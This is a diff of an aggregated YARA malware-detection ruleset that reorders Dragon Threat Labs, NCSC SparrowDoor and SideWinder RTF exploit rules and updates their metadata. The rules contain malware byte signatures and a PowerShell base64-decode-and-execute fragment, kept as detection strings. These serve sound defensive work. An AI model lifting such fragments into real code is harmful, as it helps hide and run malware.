+		reference = "https://21649046.fs1.hubspotusercontent-na1.net/hubfs/21649046/a_rattlesnake_in_the_navy.pdf"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cluster 25/sidewinder_apt_rtf_cve_2017_0199.yar#L2-L18"
+		license_url = "N/A"
+		logic_hash = "63c7b8c251a906ea9ea81a7ea838506cd2c0304b4d197eaff8cd3bac99f860ac"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		hash1 = "282367417cdc711fbad33eb6988c172c61a9a57d9f926addaefabc36cac3c004"
+		hash2 = "6d021166bdde0eab22fd4a9f398fdd8ccf8b977ff33a77c518f8d16e56d3eeee"
+
+	strings:
+		$head = "{\\rtf1" ascii
+		$obj = "objdata 0105000002000000" ascii
+		$expl = "6D007300680074006D006C000000FFD7E8130000006E756E48544D4C4170706C69636174696F6E" ascii
+		$s1 = "416374697665584F626A656374" ascii nocase
+		$s2 = "5176524d384b4e4734504332565a55753765497764426f72686974366761416259796d356c4563306a4453576e585431334a7173467870484f666b7a4c392b2f3d" ascii nocase
+		$s3 = "62203e3e2031362026203235352c2062203e3e20382026203235352c2062202620323535" ascii nocase
+
+	condition:
+		$head at 0 and $obj and $expl and 2 of ( $s* )
+}
 /*
  * YARA Rule Set
  * Repository Name: Dragon Threat Labs
  * Repository: https://github.com/mikesxrs/Open-Source-YARA-rules
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: ec0056f767db98bf6d5fd63877ad51fb54d350e9
  * Number of Rules: 7
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -171108,7 +171055,7 @@ rule DRAGON_THREAT_LABS_Apt_C16_Win_Memory_Pcclient : MEMORY APT
 		date = "2015-01-11"
 		modified = "2016-09-27"
 		reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L4-L19"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/apt_c16_win_memory_pcclient.yar#L4-L19"
 		license_url = "N/A"
 		hash = "ec532bbe9d0882d403473102e9724557"
 		logic_hash = "e863fcbcbde61db569a34509061732371143f38734a0213dc856dc3c9188b042"
@@ -171125,134 +171072,6 @@ rule DRAGON_THREAT_LABS_Apt_C16_Win_Memory_Pcclient : MEMORY APT
 	condition:
 		all of them
 }
-rule DRAGON_THREAT_LABS_Apt_C16_Win_Disk_Pcclient : DISK
-{
-	meta:
-		description = "Encoded version of pcclient found on disk"
-		author = "@dragonthreatlab"
-		id = "40e9133c-60e8-5fec-be56-1115c8bde9b1"
-		date = "2015-01-11"
-		modified = "2016-09-27"
-		reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L21-L33"
-		license_url = "N/A"
-		hash = "55f84d88d84c221437cd23cdbc541d2e"
-		logic_hash = "47e9588ef1f350ee0d2aecc7686d9e4df1ad6c19f27d749e31340eff7e31adcb"
-		score = 75
-		quality = 80
-		tags = "DISK"
-
-	strings:
-		$header = {51 5C 96 06 03 06 06 06 0A 06 06 06 FF FF 06 06 BE 06 06 06 06 06 06 06 46 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 EE 06 06 06 10 1F BC 10 06 BA 0D D1 25 BE 05 52 D1 25 5A 6E 6D 73 26 76 74 6F 67 74 65 71 26 63 65 70 70 6F 7A 26 64 69 26 74 79 70 26 6D 70 26 4A 4F 53 26 71 6F 6A 69 30 11 11 0C 2A 06 06 06 06 06 06 06 73 43 96 1B 37 24 00 4E 37 24 00 4E 37 24 00 4E BA 40 F6 4E 39 24 00 4E 5E 41 FA 4E 33 24 00 4E 5E 41 FC 4E 39 24 00 4E 37 24 FF 4E 0D 24 00 4E FA 31 A3 4E 40 24 00 4E DF 41 F9 4E 36 24 00 4E F6 2A FE 4E 38 24 00 4E DF 41 FC 4E 38 24 00 4E 54 6D 63 6E 37 24 00 4E 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 56 49 06 06 52 05 09 06 5D 87 8C 5A 06 06 06 06 06 06 06 06 E6 06 10 25 0B 05 08 06 06 1C 06 06 06 1A 06 06 06 06 06 06 E5 27 06 06 06 16 06 06 06 36 06 06 06 06 06 16 06 16 06 06 06 04 06 06 0A 06 06 06 06 06 06 06 0A 06 06 06 06 06 06 06 06 76 06 06 06 0A 06 06 06 06 06 06 04 06 06 06 06 06 16 06 06 16 06 06}
-
-	condition:
-		$header at 0
-}
-rule DRAGON_THREAT_LABS_Apt_C16_Win32_Dropper : DROPPER FILE
-{
-	meta:
-		description = "APT malware used to drop PcClient RAT"
-		author = "@dragonthreatlab"
-		id = "a1546f02-f01b-50ba-b4d9-9676e52dc4c1"
-		date = "2015-01-11"
-		modified = "2016-09-27"
-		reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L35-L52"
-		license_url = "N/A"
-		hash = "ad17eff26994df824be36db246c8fb6a"
-		logic_hash = "bb29bcf5e62cb1a55d7f0cb87b53bace26b99f858513dc4e544d531f70f54281"
-		score = 75
-		quality = 28
-		tags = "DROPPER, FILE"
-
-	strings:
-		$mz = {4D 5A}
-		$str1 = "clbcaiq.dll" ascii
-		$str2 = "profapi_104" ascii
-		$str3 = "/ShowWU" ascii
-		$str4 = "Software\\Microsoft\\Windows\\CurrentVersion\\" ascii
-		$str5 = {8A 08 2A CA 32 CA 88 08 40 4E 75 F4 5E}
-
-	condition:
-		$mz at 0 and all of ( $str* )
-}
-rule DRAGON_THREAT_LABS_Apt_C16_Win_Swisyn : MEMORY FILE
-{
-	meta:
-		description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check."
-		author = "@dragonthreatlab"
-		id = "af369075-aca3-576d-a10b-849703ffb4f1"
-		date = "2015-01-11"
-		modified = "2016-09-27"
-		reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L54-L70"
-		license_url = "N/A"
-		hash = "a6a18c846e5179259eba9de238f67e41"
-		logic_hash = "2fa29d3b17aa37501131132640953645d0089c9bc5ec13ffed7a498ad89c1558"
-		score = 75
-		quality = 28
-		tags = "MEMORY, FILE"
-
-	strings:
-		$mz = {4D 5A}
-		$str1 = "/ShowWU" ascii
-		$str2 = "IsWow64Process"
-		$str3 = "regsvr32 "
-		$str4 = {8A 11 2A 55 FC 8B 45 08 88 10 8B 4D 08 8A 11 32 55 FC 8B 45 08 88 10}
-
-	condition:
-		$mz at 0 and all of ( $str* )
-}
-rule DRAGON_THREAT_LABS_Apt_C16_Win_Wateringhole
-{
-	meta:
-		description = "Detects code from APT wateringhole"
-		author = "@dragonthreatlab"
-		id = "4958f894-91a7-56b4-90f0-40085c03382c"
-		date = "2015-01-11"
-		modified = "2016-09-27"
-		reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L72-L85"
-		license_url = "N/A"
-		logic_hash = "e866499ec77984f5bacf3f5e352393b63e0dd08fd8fd57b4990292a1dc7fbcbe"
-		score = 75
-		quality = 80
-		tags = ""
-
-	strings:
-		$str1 = "function runmumaa()"
-		$str2 = "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("
-		$str3 = "function MoSaklgEs7(k)"
-
-	condition:
-		any of ( $str* )
-}
-rule DRAGON_THREAT_LABS_Apt_C16_Win64_Dropper : DROPPER FILE
-{
-	meta:
-		description = "APT malware used to drop PcClient RAT"
-		author = "@dragonthreatlab"
-		id = "dbd1a16c-52a5-5b07-b34f-7eb7b78c1eab"
-		date = "2015-01-11"
-		modified = "2016-09-27"
-		reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L87-L104"
-		license_url = "N/A"
-		logic_hash = "df905711eca68c698ad6340e88ae99fdcae918c86ec2b7c26b62eead54fef892"
-		score = 75
-		quality = 28
-		tags = "DROPPER, FILE"
-
-	strings:
-		$mz = { 4D 5A }
-		$str1 = "clbcaiq.dll" ascii
-		$str2 = "profapi_104" ascii
-		$str3 = "\\Microsoft\\wuauclt\\wuauclt.dat" ascii
-		$str4 = { 0F B6 0A 48 FF C2 80 E9 03 80 F1 03 49 FF C8 88 4A FF 75 EC }
-
-	condition:
-		$mz at 0 and all of ( $str* )
-}
 rule DRAGON_THREAT_LABS_Apt_Win_Mocelpa
 {
 	meta:
@@ -171276,11 +171095,139 @@ rule DRAGON_THREAT_LABS_Apt_Win_Mocelpa
 	condition:
 		($mz at 0 ) and ( $ssl_hello )
 }
+rule DRAGON_THREAT_LABS_Apt_C16_Win_Disk_Pcclient : DISK
+{
+	meta:
+		description = "Encoded version of pcclient found on disk"
+		author = "@dragonthreatlab"
+		id = "40e9133c-60e8-5fec-be56-1115c8bde9b1"
+		date = "2015-01-11"
+		modified = "2016-09-27"
+		reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L21-L33"
+		license_url = "N/A"
+		hash = "55f84d88d84c221437cd23cdbc541d2e"
+		logic_hash = "47e9588ef1f350ee0d2aecc7686d9e4df1ad6c19f27d749e31340eff7e31adcb"
+		score = 75
+		quality = 80
+		tags = "DISK"
+
+	strings:
+		$header = {51 5C 96 06 03 06 06 06 0A 06 06 06 FF FF 06 06 BE 06 06 06 06 06 06 06 46 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 EE 06 06 06 10 1F BC 10 06 BA 0D D1 25 BE 05 52 D1 25 5A 6E 6D 73 26 76 74 6F 67 74 65 71 26 63 65 70 70 6F 7A 26 64 69 26 74 79 70 26 6D 70 26 4A 4F 53 26 71 6F 6A 69 30 11 11 0C 2A 06 06 06 06 06 06 06 73 43 96 1B 37 24 00 4E 37 24 00 4E 37 24 00 4E BA 40 F6 4E 39 24 00 4E 5E 41 FA 4E 33 24 00 4E 5E 41 FC 4E 39 24 00 4E 37 24 FF 4E 0D 24 00 4E FA 31 A3 4E 40 24 00 4E DF 41 F9 4E 36 24 00 4E F6 2A FE 4E 38 24 00 4E DF 41 FC 4E 38 24 00 4E 54 6D 63 6E 37 24 00 4E 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 56 49 06 06 52 05 09 06 5D 87 8C 5A 06 06 06 06 06 06 06 06 E6 06 10 25 0B 05 08 06 06 1C 06 06 06 1A 06 06 06 06 06 06 E5 27 06 06 06 16 06 06 06 36 06 06 06 06 06 16 06 16 06 06 06 04 06 06 0A 06 06 06 06 06 06 06 0A 06 06 06 06 06 06 06 06 76 06 06 06 0A 06 06 06 06 06 06 04 06 06 06 06 06 16 06 06 16 06 06}
+
+	condition:
+		$header at 0
+}
+rule DRAGON_THREAT_LABS_Apt_C16_Win32_Dropper : DROPPER FILE
+{
+	meta:
+		description = "APT malware used to drop PcClient RAT"
+		author = "@dragonthreatlab"
+		id = "a1546f02-f01b-50ba-b4d9-9676e52dc4c1"
+		date = "2015-01-11"
+		modified = "2016-09-27"
+		reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L35-L52"
+		license_url = "N/A"
+		hash = "ad17eff26994df824be36db246c8fb6a"
+		logic_hash = "bb29bcf5e62cb1a55d7f0cb87b53bace26b99f858513dc4e544d531f70f54281"
+		score = 75
+		quality = 28
+		tags = "DROPPER, FILE"
+
+	strings:
+		$mz = {4D 5A}
+		$str1 = "clbcaiq.dll" ascii
+		$str2 = "profapi_104" ascii
+		$str3 = "/ShowWU" ascii
+		$str4 = "Software\\Microsoft\\Windows\\CurrentVersion\\" ascii
+		$str5 = {8A 08 2A CA 32 CA 88 08 40 4E 75 F4 5E}
+
+	condition:
+		$mz at 0 and all of ( $str* )
+}
+rule DRAGON_THREAT_LABS_Apt_C16_Win_Swisyn : MEMORY FILE
+{
+	meta:
+		description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check."
+		author = "@dragonthreatlab"
+		id = "af369075-aca3-576d-a10b-849703ffb4f1"
+		date = "2015-01-11"
+		modified = "2016-09-27"
+		reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L54-L70"
+		license_url = "N/A"
+		hash = "a6a18c846e5179259eba9de238f67e41"
+		logic_hash = "2fa29d3b17aa37501131132640953645d0089c9bc5ec13ffed7a498ad89c1558"
+		score = 75
+		quality = 28
+		tags = "MEMORY, FILE"
+
+	strings:
+		$mz = {4D 5A}
+		$str1 = "/ShowWU" ascii
+		$str2 = "IsWow64Process"
+		$str3 = "regsvr32 "
+		$str4 = {8A 11 2A 55 FC 8B 45 08 88 10 8B 4D 08 8A 11 32 55 FC 8B 45 08 88 10}
+
+	condition:
+		$mz at 0 and all of ( $str* )
+}
+rule DRAGON_THREAT_LABS_Apt_C16_Win_Wateringhole
+{
+	meta:
+		description = "Detects code from APT wateringhole"
+		author = "@dragonthreatlab"
+		id = "4958f894-91a7-56b4-90f0-40085c03382c"
+		date = "2015-01-11"
+		modified = "2016-09-27"
+		reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L72-L85"
+		license_url = "N/A"
+		logic_hash = "e866499ec77984f5bacf3f5e352393b63e0dd08fd8fd57b4990292a1dc7fbcbe"
+		score = 75
+		quality = 80
+		tags = ""
+
+	strings:
+		$str1 = "function runmumaa()"
+		$str2 = "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("
+		$str3 = "function MoSaklgEs7(k)"
+
+	condition:
+		any of ( $str* )
+}
+rule DRAGON_THREAT_LABS_Apt_C16_Win64_Dropper : DROPPER FILE
+{
+	meta:
+		description = "APT malware used to drop PcClient RAT"
+		author = "@dragonthreatlab"
+		id = "dbd1a16c-52a5-5b07-b34f-7eb7b78c1eab"
+		date = "2015-01-11"
+		modified = "2016-09-27"
+		reference = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Dragonthreatlabs/dragonthreatlabs_index.yara#L87-L104"
+		license_url = "N/A"
+		logic_hash = "df905711eca68c698ad6340e88ae99fdcae918c86ec2b7c26b62eead54fef892"
+		score = 75
+		quality = 28
+		tags = "DROPPER, FILE"
+
+	strings:
+		$mz = { 4D 5A }
+		$str1 = "clbcaiq.dll" ascii
+		$str2 = "profapi_104" ascii
+		$str3 = "\\Microsoft\\wuauclt\\wuauclt.dat" ascii
+		$str4 = { 0F B6 0A 48 FF C2 80 E9 03 80 F1 03 49 FF C8 88 4A FF 75 EC }
+
+	condition:
+		$mz at 0 and all of ( $str* )
+}
 /*
  * YARA Rule Set
  * Repository Name: Microsoft
  * Repository: https://github.com/mikesxrs/Open-Source-YARA-rules
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: ec0056f767db98bf6d5fd63877ad51fb54d350e9
  * Number of Rules: 21
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -171833,7 +171780,7 @@ rule MICROSOFT_Trojan_Win32_Plakpeer : PLATINUM
 		hash = "2155c20483528377b5e3fde004bb604198463d29"
 		logic_hash = "cc34ce9f12c95133872783090efd5813d3e2f44a1c726d29b2ba834509c9a1d5"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "PLATINUM"
 		unpacked_sample_sha1 = "dc991ef598825daabd9e70bac92c79154363bab2"
 		activity_group = "Platinum"
@@ -171883,7 +171830,7 @@ rule MICROSOFT_Devilstongue_Hijackdll : FILE
  * YARA Rule Set
  * Repository Name: NCSC
  * Repository: https://github.com/mikesxrs/Open-Source-YARA-rules
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: ec0056f767db98bf6d5fd63877ad51fb54d350e9
  * Number of Rules: 17
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -171893,101 +171840,76 @@ rule MICROSOFT_Devilstongue_Hijackdll : FILE
  *
  * NO LICENSE SET
  */
-rule NCSC_Sparrowdoor_Config : FILE
-{
-	meta:
-		description = "Targets the XOR encoded loader config and shellcode in the file libhost.dll using the known position of the XOR key."
-		author = "NCSC"
-		id = "16eec5b6-c77a-585d-88f3-2c86abdbf2bd"
-		date = "2022-02-28"
-		modified = "2022-07-06"
-		reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_config.yar#L1-L14"
-		license_url = "N/A"
-		logic_hash = "bd52496b6e7cabc875a277ce7d49f6b891c3f61591edef295dbee43716c15509"
-		score = 75
-		quality = 80
-		tags = "FILE"
-		hash1 = "c1890a6447c991880467b86a013dbeaa66cc615f"
-
-	condition:
-		( uint16( 0 ) != 0x5A4D ) and ( uint16( 0 ) != 0x8b55 ) and ( uint32( 0 ) ^ uint32( 0x4c ) == 0x00 ) and ( uint32( 0 ) ^ uint32( 0x34 ) == 0x00 ) and ( uint16( 0 ) ^ uint16( 0x50 ) == 0x8b55 )
-}
-rule NCSC_Sparrowdoor_Xor
+rule NCSC_Sparrowdoor_Sleep_Routine
 {
 	meta:
-		description = "Highlights XOR routines in SparrowDoor. No MZ/PE match as the backdoor has no header. Targeting in memory."
+		description = "SparrowDoor implements a Sleep routine with value seeded on GetTickCount. This signature detects the previous and this variant of SparrowDoor. No MZ/PE match as the backdoor has no header."
 		author = "NCSC"
-		id = "9c07feea-91fc-528e-91ac-14d09fa1fc10"
+		id = "9a0aa77d-7dbe-5007-b875-211cf528614b"
 		date = "2022-02-28"
 		modified = "2022-07-06"
 		reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_xor.yar#L1-L14"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_sleep_routine.yar#L1-L12"
 		license_url = "N/A"
-		logic_hash = "3244e9017e5a0bf1c54e03b3191a5c695b2c1586b3ed4c529742f9b48903a348"
+		logic_hash = "8ae231cb43440e1771d9f7ecaccfedae33f4d14e5ebabd94a909e05bd9fe1bc1"
 		score = 75
 		quality = 80
 		tags = ""
 		hash1 = "c1890a6447c991880467b86a013dbeaa66cc615f"
 
 	strings:
-		$xor_routine_outbound = {B8 39 8E E3 38 F7 E1 D1 EA 8D 14 D2 8B C1 2B C2 8A [4] 00 30 14 39 41 3B CE}
-		$xor_routine_inbound = {B8 25 49 92 24 F7 E1 8B C1 2B C2 D1 E8 03 C2 C1 E8 02 8D 14 C5 [4] 2B D0 8B C1 2B C2}
-		$xor_routine_config = {8B D9 83 E3 07 0F [6] 30 18 8D 1C 07 83 E3 07 0F [6] 30 58 01 8D 1C 28 83 E3 07 0F [6] 30 58 02 8D 1C 02 83 E3 07 0F [6] 30 58 03 8B DE 83 E3 07 0F [6] 30 58 04 83 C6 05 83 C1 05}
+		$sleep = {FF D7 33 D2 B9 [4] F7 F1 81 C2 [4] 8B C2 C1 E0 04 2B C2 03 C0 03 C0 03 C0 50}
 
 	condition:
-		2 of them
+		all of them
 }
-
-rule NCSC_Sparrowdoor_Clipshot : FILE
+rule NCSC_Sparrowdoor_Config : FILE
 {
 	meta:
-		description = "The SparrowDoor loader contains a feature it calls clipshot, which logs clipboard data to a file."
+		description = "Targets the XOR encoded loader config and shellcode in the file libhost.dll using the known position of the XOR key."
 		author = "NCSC"
-		id = "186e694b-6ae1-5042-847a-f54708dc76ef"
+		id = "16eec5b6-c77a-585d-88f3-2c86abdbf2bd"
 		date = "2022-02-28"
 		modified = "2022-07-06"
 		reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_clipshot.yar#L3-L20"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_config.yar#L1-L14"
 		license_url = "N/A"
-		logic_hash = "7662e3be2752ac82d6cfe4b2e420157e78367c201c25ae34b5d956dc53ba20ae"
+		logic_hash = "bd52496b6e7cabc875a277ce7d49f6b891c3f61591edef295dbee43716c15509"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		hash1 = "989b3798841d06e286eb083132242749c80fdd4d"
-
-	strings:
-		$exsting_cmp = {8B 1E 3B 19 75 ?? 83 E8 04 83 C1 04 83 C6 04 83 F8 04}
-		$time_format_string = "%d/%d/%d %d:%d" ascii
-		$cre_fil_args = {6A 00 68 80 00 00 00 6A 04 6A 00 6A 02 68 00 00 00 40 52}
+		hash1 = "c1890a6447c991880467b86a013dbeaa66cc615f"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and uint32( uint32( 0x3C ) ) == 0x00004550 and all of them and ( pe.imports ( "User32.dll" , "OpenClipboard" ) and pe.imports ( "User32.dll" , "GetClipboardData" ) and pe.imports ( "Kernel32.dll" , "GetLocalTime" ) and pe.imports ( "Kernel32.dll" , "GlobalSize" ) )
+		( uint16( 0 ) != 0x5A4D ) and ( uint16( 0 ) != 0x8b55 ) and ( uint32( 0 ) ^ uint32( 0x4c ) == 0x00 ) and ( uint32( 0 ) ^ uint32( 0x34 ) == 0x00 ) and ( uint16( 0 ) ^ uint16( 0x50 ) == 0x8b55 )
 }
-rule NCSC_Sparrowdoor_Loader : FILE
+rule NCSC_Sparrowdoor_Apipatch
 {
 	meta:
-		description = "Targets code features of the SparrowDoor loader. This rule detects the previous variant and this new variant."
+		description = "Identifies code segments in SparrowDoor responsible for patching APIs. No MZ/PE match as the backdoor has no header. Targeting in memory."
 		author = "NCSC"
-		id = "7107cb82-c4c9-503f-b006-baec6b667498"
+		id = "119b7f3a-1850-53ab-a5d1-8882e34a34b4"
 		date = "2022-02-28"
 		modified = "2022-07-06"
 		reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_loader.yar#L1-L15"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_apipatch.yar#L1-L17"
 		license_url = "N/A"
-		logic_hash = "fa1bd386114d912722a5101a0112355dec654e2e9446c885c12946c7fae1c8f4"
+		logic_hash = "302ad7fc0354636c57e6ec86876c7d4a5baaa784f5ecf0f2d51ce47631b8542a"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		hash1 = "989b3798841d06e286eb083132242749c80fdd4d"
+		tags = ""
+		hash1 = "c1890a6447c991880467b86a013dbeaa66cc615f"
 
 	strings:
-		$xor_algo = {8B D0 83 E2 03 8A 54 14 10 30 14 30 40 3B C1}
-		$rva = {8D B0 [4] 8D 44 24 ?? 50 6A 40 6A 05 56}
-		$lj = {2B CE 83 E9 05 8D [3] 52 C6 06 E9 89 4E 01 8B [3] 50 6A 05 56}
+		$save = {8B 06 89 07 8A 4E 04}
+		$vp_1 = {89 10 8A 4E 04 8B D6 2B D0 88 48 04 83 EA 05 C6 40 05 E9 89 50 06}
+		$vp_2 = {50 8B D6 6A 40 2B D7 88 4F 04 83 EA 05 6A 05 C6 47 05 E9 89 57 06 56}
+		$vp_3 = {51 52 2B DE 6A 05 83 EB 05 56 C6 06 E9 89 5E 01}
+		$va = {6A 40 68 00 10 00 00 68 00 10 00 00 6A 00}
+		$s_patch = {50 68 7F FF FF FF 68 FF FF 00 00 56}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and uint32( uint32( 0x3C ) ) == 0x00004550 and all of them
+		3 of them
 }
 rule NCSC_Sparrowdoor_Shellcode
 {
@@ -172264,33 +172186,56 @@ rule NCSC_Neuron2_Dotnet_Strings : FILE
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and $dotnetMagic and 2 of ( $s* )
 }
-rule NCSC_Sparrowdoor_Apipatch
+rule NCSC_Sparrowdoor_Loader : FILE
 {
 	meta:
-		description = "Identifies code segments in SparrowDoor responsible for patching APIs. No MZ/PE match as the backdoor has no header. Targeting in memory."
+		description = "Targets code features of the SparrowDoor loader. This rule detects the previous variant and this new variant."
 		author = "NCSC"
-		id = "119b7f3a-1850-53ab-a5d1-8882e34a34b4"
+		id = "7107cb82-c4c9-503f-b006-baec6b667498"
 		date = "2022-02-28"
 		modified = "2022-07-06"
 		reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_apipatch.yar#L1-L17"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_loader.yar#L1-L15"
 		license_url = "N/A"
-		logic_hash = "302ad7fc0354636c57e6ec86876c7d4a5baaa784f5ecf0f2d51ce47631b8542a"
+		logic_hash = "fa1bd386114d912722a5101a0112355dec654e2e9446c885c12946c7fae1c8f4"
 		score = 75
 		quality = 80
-		tags = ""
-		hash1 = "c1890a6447c991880467b86a013dbeaa66cc615f"
+		tags = "FILE"
+		hash1 = "989b3798841d06e286eb083132242749c80fdd4d"
 
 	strings:
-		$save = {8B 06 89 07 8A 4E 04}
-		$vp_1 = {89 10 8A 4E 04 8B D6 2B D0 88 48 04 83 EA 05 C6 40 05 E9 89 50 06}
-		$vp_2 = {50 8B D6 6A 40 2B D7 88 4F 04 83 EA 05 6A 05 C6 47 05 E9 89 57 06 56}
-		$vp_3 = {51 52 2B DE 6A 05 83 EB 05 56 C6 06 E9 89 5E 01}
-		$va = {6A 40 68 00 10 00 00 68 00 10 00 00 6A 00}
-		$s_patch = {50 68 7F FF FF FF 68 FF FF 00 00 56}
+		$xor_algo = {8B D0 83 E2 03 8A 54 14 10 30 14 30 40 3B C1}
+		$rva = {8D B0 [4] 8D 44 24 ?? 50 6A 40 6A 05 56}
+		$lj = {2B CE 83 E9 05 8D [3] 52 C6 06 E9 89 4E 01 8B [3] 50 6A 05 56}
 
 	condition:
-		3 of them
+		( uint16( 0 ) == 0x5A4D ) and uint32( uint32( 0x3C ) ) == 0x00004550 and all of them
+}
+
+rule NCSC_Sparrowdoor_Clipshot : FILE
+{
+	meta:
+		description = "The SparrowDoor loader contains a feature it calls clipshot, which logs clipboard data to a file."
+		author = "NCSC"
+		id = "186e694b-6ae1-5042-847a-f54708dc76ef"
+		date = "2022-02-28"
+		modified = "2022-07-06"
+		reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_clipshot.yar#L3-L20"
+		license_url = "N/A"
+		logic_hash = "7662e3be2752ac82d6cfe4b2e420157e78367c201c25ae34b5d956dc53ba20ae"
+		score = 75
+		quality = 80
+		tags = "FILE"
